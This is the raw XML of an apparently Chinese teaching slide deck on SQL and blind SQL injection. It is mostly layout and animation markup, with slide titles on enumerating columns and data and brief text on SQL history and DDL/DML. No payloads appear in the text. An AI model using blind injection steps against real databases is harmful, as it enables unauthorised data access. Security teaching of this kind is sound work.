                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1279EEF-2D86-40A8-B69A-B5F120053877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2540943" y="2822753"/>
            <a:ext cx="8392141" cy="1179370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F03731-BE45-4B4A-8245-16BBE5A8EA04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5202512" y="4297022"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98EB7FF4-5EE4-48E8-93BE-F245EB82E485}"/>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1A5B3679-FC44-4677-A9C5-05BD4A2B896B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5875377" y="837929"/>
              <a:ext cx="1107996"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列举列</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59E119E1-3136-4D70-9F8E-AED8FEE57450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755921" y="5053586"/>
            <a:ext cx="11439357" cy="1158845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197901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outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="16" presetClass="entr" presetSubtype="37"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barn(outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="16" presetClass="entr" presetSubtype="37"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arn(outVertical)">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669377B6-1F1E-4587-B372-D86DE4BC5CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5202512" y="847355"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{523B8BFE-7377-4418-AAEE-C1054F169F6A}"/>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9B7E8BC9-8718-4D9E-81BB-36243CAED864}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5721489" y="837929"/>
              <a:ext cx="1415773"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列举数据</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C290C7-CC05-4F73-AE73-780DE0753835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="956767" y="1712632"/>
            <a:ext cx="10591567" cy="1098060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 148">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AAF376E-CBC0-4455-9815-2D607CF4E903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1964879" y="3112269"/>
            <a:ext cx="8943308" cy="2857625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F3D7C8-74F1-416F-87CE-6713C15975E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999039">
            <a:off x="9708651" y="3943273"/>
            <a:ext cx="2673277" cy="2673277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2671870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arn(outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>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arn(outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="2" presetClass="entr" presetSubtype="2" decel="60000"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1+#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1388815" y="2896245"/>
            <a:ext cx="10441160" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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知识点三：</a:t>
            </a:r>
            <a:r>
              <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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000"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盲注</a:t>
            </a:r>
            <a:endPar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630107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100783" y="1453648"/>
            <a:ext cx="10657184" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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是用于访问和处理数据库的标准的计算机语言。</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是二十世纪七十年代由</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IBM</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创建的，于</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1992</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年作为国际标准纳入</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ANSI</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38" name="ïṧḷïḓê-Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E63C9A-55C1-4E50-98D1-BF63B91B4883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3515022" y="3423056"/>
            <a:ext cx="435157" cy="435156"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="i$liḋe-Straight Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A4BA7A-E460-45BB-AF20-6BD231FB6006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3515935" y="4734874"/>
            <a:ext cx="435157" cy="435156"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7939CD86-9FD2-4ACA-ABB7-D19FD21D1EFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3738155" y="2393505"/>
            <a:ext cx="1285232" cy="1285232"/>
            <a:chOff x="3770163" y="2393505"/>
            <a:chExt cx="1285232" cy="1285232"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="i$liḋe-Freeform: Shape 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EF42C3C-A0DB-40CD-A502-092D1B9477D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="18900000">
              <a:off x="3770163" y="2393505"/>
              <a:ext cx="1285232" cy="128523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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="文本框 74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51FA86E6-40D3-4CD0-9C15-C83AE6C7F344}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3783143" y="2577013"/>
              <a:ext cx="1259270" cy="918216"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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数据定义语言（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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DDL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAE96DFA-6516-4B50-950E-8F68A233AD51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3738154" y="4962626"/>
            <a:ext cx="1286895" cy="1285233"/>
            <a:chOff x="3770162" y="4962626"/>
            <a:chExt cx="1286895" cy="1285233"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="i$liḋe-Freeform: Shape 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9883ED2E-1980-4C7E-9135-9805F7AD8C89}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="18900000">
              <a:off x="3770162" y="4962626"/>
              <a:ext cx="1285232" cy="1285233"/>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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="文本框 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B068950B-45B3-43F5-AECE-EE208AC8271C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3797787" y="5170030"/>
              <a:ext cx="1259270" cy="918216"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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数据操作语言（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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DML</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3033B8EE-6E5A-45FE-B02F-7A85B4B1CB2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2293517" y="3513368"/>
            <a:ext cx="1566354" cy="1566352"/>
            <a:chOff x="2325525" y="3513368"/>
            <a:chExt cx="1566354" cy="1566352"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="i$liḋe-Freeform: Shape 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5778C95C-0157-4F1E-BD60-916E97DC2103}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="18900000">
              <a:off x="2325525" y="3513368"/>
              <a:ext cx="1566354" cy="156635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FFC000"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="文本框 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB7956E-535F-4928-A4F2-727749899E55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2353933" y="3944917"/>
              <a:ext cx="1509531" cy="702773"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ct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由</a:t>
              </a:r>
              <a:endPar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两部分组成</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形: 圆角 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0F91AE-3150-4A4F-BE5C-5BD47F5BEB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5533877" y="2684734"/>
            <a:ext cx="5400600" cy="702773"/>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DDL</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用于定义数据库结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73A6A70F-3FE8-42DC-99C3-B2971FDADF84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="875216"/>
            <a:ext cx="2231857" cy="508862"/>
            <a:chOff x="596727" y="875216"/>
            <a:chExt cx="2231857" cy="508862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="组合 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E99E241B-4002-4B98-89C1-8A6F31F8AFDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="596727" y="875216"/>
              <a:ext cx="2231857" cy="508862"/>
              <a:chOff x="1420106" y="1402730"/>
              <a:chExt cx="2231857" cy="508862"/>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2568651" y="828281"/>
                <a:ext cx="508861" cy="1657762"/>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2053958" y="1402731"/>
                <a:ext cx="1598005"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en-US" altLang="zh-CN"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SQL</a:t>
                </a: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语法</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3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24" name="sql-open-file-format_28954">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFDD6D54-A0CA-4B57-8801-B3E43757CA8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="743432" y="953861"/>
              <a:ext cx="335838" cy="348616"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 456840 w 584211"/>
                <a:gd name="connsiteY0" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX1" fmla="*/ 478574 w 584211"/>
                <a:gd name="connsiteY1" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX2" fmla="*/ 478574 w 584211"/>
                <a:gd name="connsiteY2" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX3" fmla="*/ 456840 w 584211"/>
                <a:gd name="connsiteY3" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX4" fmla="*/ 430943 w 584211"/>
                <a:gd name="connsiteY4" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX5" fmla="*/ 452677 w 584211"/>
                <a:gd name="connsiteY5" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX6" fmla="*/ 452677 w 584211"/>
                <a:gd name="connsiteY6" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX7" fmla="*/ 430943 w 584211"/>
                <a:gd name="connsiteY7" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX8" fmla="*/ 405539 w 584211"/>
                <a:gd name="connsiteY8" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX9" fmla="*/ 427273 w 584211"/>
                <a:gd name="connsiteY9" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX10" fmla="*/ 427273 w 584211"/>
                <a:gd name="connsiteY10" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX11" fmla="*/ 405539 w 584211"/>
                <a:gd name="connsiteY11" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX12" fmla="*/ 379642 w 584211"/>
                <a:gd name="connsiteY12" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX13" fmla="*/ 401447 w 584211"/>
                <a:gd name="connsiteY13" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX14" fmla="*/ 401447 w 584211"/>
                <a:gd name="connsiteY14" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX15" fmla="*/ 379642 w 584211"/>
                <a:gd name="connsiteY15" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX16" fmla="*/ 502779 w 584211"/>
                <a:gd name="connsiteY16" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX17" fmla="*/ 530158 w 584211"/>
                <a:gd name="connsiteY17" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX18" fmla="*/ 530158 w 584211"/>
                <a:gd name="connsiteY18" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX19" fmla="*/ 502779 w 584211"/>
                <a:gd name="connsiteY19" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX20" fmla="*/ 470389 w 584211"/>
                <a:gd name="connsiteY20" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX21" fmla="*/ 497627 w 584211"/>
                <a:gd name="connsiteY21" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX22" fmla="*/ 497627 w 584211"/>
                <a:gd name="connsiteY22" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX23" fmla="*/ 470389 w 584211"/>
                <a:gd name="connsiteY23" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX24" fmla="*/ 438423 w 584211"/>
                <a:gd name="connsiteY24" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX25" fmla="*/ 465661 w 584211"/>
                <a:gd name="connsiteY25" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX26" fmla="*/ 465661 w 584211"/>
                <a:gd name="connsiteY26" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX27" fmla="*/ 438423 w 584211"/>
                <a:gd name="connsiteY27" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX28" fmla="*/ 405892 w 584211"/>
                <a:gd name="connsiteY28" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX29" fmla="*/ 433271 w 584211"/>
                <a:gd name="connsiteY29" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX30" fmla="*/ 433271 w 584211"/>
                <a:gd name="connsiteY30" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX31" fmla="*/ 405892 w 584211"/>
                <a:gd name="connsiteY31" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX32" fmla="*/ 373503 w 584211"/>
                <a:gd name="connsiteY32" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX33" fmla="*/ 400882 w 584211"/>
                <a:gd name="connsiteY33" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX34" fmla="*/ 400882 w 584211"/>
                <a:gd name="connsiteY34" fmla="*/ 370891 h 606439"/>
